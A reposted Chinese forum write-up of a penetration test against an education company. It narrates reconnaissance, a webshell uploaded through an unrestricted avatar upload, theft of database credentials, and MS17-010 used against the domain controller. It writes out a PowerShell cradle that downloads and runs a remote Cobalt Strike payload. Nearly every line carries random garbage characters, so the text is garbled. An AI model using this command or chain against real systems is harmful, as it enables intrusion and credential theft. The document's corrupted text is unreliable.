|
" u3 Q, `, B' U2 ~7 `3 H& h2 H) W/ V 这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路
2 N' j$ a& @ Q4 C/ O9 c 9 z- \* O, M5 }/ I! _- h# l
5 }3 ^2 u4 l v* c4 e0 \: ~ t
7 S% J1 J. T* N6 Q% A
) T' B- I O7 ^9 D. V: m
' z6 x8 f# N& N+ S0 A9 U" i2 D' H 正文
: `6 e4 j" F" c6 D
: J/ F8 `& A/ A% i
; \" r- Q' A' Q u' w; W+ j
: R: N8 d. k: } J' g N7 _
8 m7 w0 |" t) Z8 ?5 c- f. N, Q
! k x. S& N' }. `$ k! f 目标:www.xxxx.com(一家教育机构) 4 s- g8 e+ Z0 ]4 H: w" W7 Q: I: r$ y$ L
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能% ]; o* }5 n H8 [) O. k7 s: ?' r- P
( V4 C+ {: v$ j# _6 z
6 _ b- q& L) ~% c! V
4 |, x) Q/ F3 Y5 c6 F
6 G3 O. ]5 R! z% v; P' u9 p: T
' W3 l6 s6 p- l2 e. A7 w
进行了简单的信息搜集
" X, p# e3 F( f ( J+ S( q; o* u+ I }6 ?# M
7 z5 R) Y/ {8 O3 s' q( x/ F6 w
r3 h0 m8 I4 u4 m: ]
8 \9 l. k+ S6 a& t- v( n 子域名搜集
, S y! K1 N3 L$ a8 \* }$ R3 r; }
$ q* t+ m1 u$ Y# l. g
$ Z& k+ s# j4 Q, e $ d9 _0 r) n1 L9 r. X) N( o/ u8 ?4 K
( n' t' J0 s: R2 C, L
$ E) v6 v6 N2 M8 ~
fofa找资产
" T9 q# s2 k6 \2 e, J ' p) Y; t& C, [1 Y, ~" W
* ]1 S2 k! L9 d0 `- X
1 _, e6 p0 F/ _) }* `
: ?( N# v6 ~, ]1 Q
0 Z/ v1 S- D1 N* t8 |
0 q0 U& w; j* ?3 m' ^7 W( N" n
9 k5 f3 A, t9 r C2 \0 _# o* p 一共七个资产。去重之后只有两个。 9 B) h% s3 W& L4 C( V
( ^' E, U9 d& a. A5 h0 c1 C7 s- n
) A7 h+ `0 l4 l! b; i7 ?
0 Y0 z' x& y% u5 F0 H! Y
3 |8 F' `, M' u3 v 目录探测- U& g# I# d! E" ?- l5 @1 o6 I
; \5 \' x0 w% m& v6 {2 d( e7 `/ O
2 b$ R: t9 i3 Z! z3 @8 V 8 C7 Y1 ]9 p$ o. o
1 t1 E4 v5 [5 d9 A- b) r. s' r! _- c8 T- e
我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
3 E' Y! h& [. F% t
! R9 |2 F" I2 D6 Q4 R' S' A3 W2 D
$ \! A6 [ y* C% V9 N. Y& x
4 [1 `) q+ f$ ]
我又尝试了通过修改返回包来绕过登录界面
$ i/ [/ K! ]0 I 0 z& V9 |3 @4 Z9 i
K* \. g, {0 u# q$ Z L/ G
8 \0 U# p. ^) F& k
4 I& z- Z+ `; A& c# U2 E* P( k- j+ h$ |( G9 y) Y- {" L
还是不行,尝试注入无果7 f2 e# x7 ^9 l6 k
/ l$ }# J# f' f% e0 H
9 z: W1 E' e+ k9 y
# J3 r+ D$ \( P; J# p+ T5 q x) U J$ p5 ~! y Z/ \
2 ~2 p% c5 b7 w
不过我目录探测出了一处Spring信息泄露 . e- q+ V+ v- O7 F7 v" I5 V
7 ^& j) A" B, m8 }# g' y, ]
. L8 ~& {% ^) \, E0 h5 c; H' X
+ I! q6 s I: C( {5 C& o6 g
/ c9 C- T/ q$ d }7 N
# R& M- U: r% r, k3 U8 m7 t2 F G
, a. }( z- S8 ]9 p3 q. j2 O
' ?$ m- z% `$ j2 F9 |- C- X8 z 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录3 U: {9 L9 t- o: [
/ l* n2 u3 X& m/ r) D' d9 G8 K0 X6 E
8 z& N: z: m( K/ r2 L ! p# P2 R7 E/ k$ r
# V t4 ?# m7 {( h0 v
后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。" Z9 U) I8 v$ ?
1 E4 T: P/ M6 _# s9 ?1 e" ^ Y0 \
0 g4 j" ^4 e- Z1 P7 w9 ~' j' F 9 v$ j. i i' o o* e3 g" T H7 w+ [
, M# A( S* d7 p' W& b8 _2 _- A
/ H: o/ Z/ T! }$ a
获取有些师傅到这一步就手机抓包电脑测了。
3 n0 |0 \ {3 }( x; d# | $ x, w3 s H1 D! V: k+ s) i: v0 Q
/ i- Y4 B; Q" w$ r( x7 C4 H* J Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。
9 W8 d- N ~& e$ e. a) f" ~6 J, r + @0 j$ Z) e$ l% [$ ]
9 o3 J3 y. U' F @% I 其中在一个公众号发现了小程序,可以进行注册。+ B* V U& v( |' O/ q
: f0 g1 ]& j/ ?) v
8 c: @( w# H$ h% G$ \+ ~) q" ` 看到了头像上传,尝试上传获取WebShell
/ C1 x* \/ j1 |8 i # `# g! N- h' T- Z9 w1 B7 A
, h* b1 V% s0 f0 e1 G# V
: ?8 T' V+ w2 E2 Y' s3 n
8 ^4 D" D2 z# L, n
* S. s; r; _* f- {) l6 ?1 D 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问3 J: q$ v2 [- R
2 }- e) k: q( Y" J( n. K* ]/ h. P5 _
H( |9 H6 s, H
0 H- S* Z# S8 U, ]$ D
u$ g$ `6 O: p5 i, o 然后上了大马3 w. g- M6 k; e X
$ f9 O; i3 V% D8 G
# C" z5 e+ I% \4 Y9 F! K
% l7 B' Y) G0 e+ Z8 p; r
' x9 z. H% k- I$ ]0 V- A$ n u6 M7 B" M2 f' W% m" Q% g
8 B# J$ ]" }$ A* X9 o- [
, c* \! G- `" a1 ]3 L8 S
; L S* J+ N$ k 通过翻找文件发现数据库账号密码
- i6 ]- \& [$ D; t5 v$ F- S" ~# t& X 1 g/ ]7 m5 C$ B/ z5 E/ G
: v! W u! x6 r1 Q, h9 G 4 f/ T2 ~: f: k0 r: l* Y
. m0 B+ \. x! A$ c2 b! g
; S4 ^& J) a) ]% Z1 k --内网渗透7 U3 k: i' k* T& J7 [
3 ]$ M, g0 `3 }1 x* z* K+ Z: {' k
v- B. U/ j; |: ^
直接通过powershell执行 cs上线) b; o" F2 k9 P: j6 E
- c( N1 X3 s) l/ r+ I& \4 {. p9 F& |- o
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"
?9 J5 w. g+ C3 i( Y # _) A. J% t Q% s, P
* G$ E2 Q) y O7 ^ ; |1 k( a5 |0 a& N8 R) ~& t/ r
4 _3 X( ?& x7 ^6 `9 ^4 t
7 k8 ~( M7 j' {' L! Z+ D$ H1 }
进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破, a! D: P" B4 s9 q$ s6 J
/ r! o* J# ~& n9 P. }& v" G; a5 I6 m2 d% i- z% S8 ^2 |
o v+ i5 m5 C$ Y8 E # g4 N" K% W* ~+ j
( Z2 \* W6 `6 b6 G+ p
登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
: Q6 ~( c, w! r3 g
) ^) F$ h& d9 J [& N: B
; p7 X) Q! F S: E2 r2 x
2 A4 X* {* b; K4 A8 Q0 N
4 I! L" x9 }- m' Q& U2 _3 y2 a* `
9 M/ r& D6 t# @) n
0 m( p5 A _! q; V! M: }
$ I& ?/ z0 Y, F: K! k. ^1 ^
R& o4 f+ H! c 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭 # \5 g6 F* O3 p
6 }9 J# h, c: R, K0 X# \ n
' U( A+ Z9 m, X 0 U& q m/ h% e: }* n p
# M# t5 t; O: p' w
1 O+ H4 }, A% M5 p( W& u
: O9 M2 ]$ }' G
9 K7 R& c) I) i [4 S0 s' l1 `: I2 ~/ l
p* M6 a) j, q% e
! q% [) M, L% s/ o) r
) [( ?6 _4 f. n" `, T! ?% N; T3 v# x
2 g1 j3 V! C, E/ v+ ?% O7 V, m- I2 _ 2 J; M+ m, x* S7 S' ?$ P
7 i( I, n) i6 Q: O# S4 _, e7 G/ q, m/ k& u/ W7 R
小结
2 }% y: j' c- U
5 g! ~6 d" S* n2 ?
! e4 ?4 |) r) L1 i0 z$ [, A2 P 4 @% _0 T' l; Y! D" d. [" Z
) @4 I& ~) W7 A- M4 Z6 Z$ f9 Q( w" Z9 A4 c5 f
在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!
, R' @5 h; Q0 a) \ 8 }4 Y; k; s; C8 u
! W* y" H$ U% w+ ~- p1 e( m( ]/ }9 E
- {! n' S7 f/ K$ a& y + h' _7 T( W9 o6 ~6 D
8 L& b5 E3 h$ k" C -
* ^$ [3 f+ T8 c+ V4 G 8 V4 I2 m0 j w( T" g- p, `
' G3 P: s( F) O! P/ Q, O9 u( G -
8 r' H, R" K2 Z5 x* Y# C + ?8 H" S ^2 B9 E8 s1 i
( c, S, a; \ F/ c
$ G( r- {8 r6 a9 l( Y3 S Q. ^3 g/ S3 @
作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html
T* w* ~) ~) S# T& C B. w# f8 B / h( p/ |& q+ ~) X5 Z
5 U- d3 y3 Z7 y7 h& g9 n - b) \' j. _+ O! o3 w5 C& O1 L
|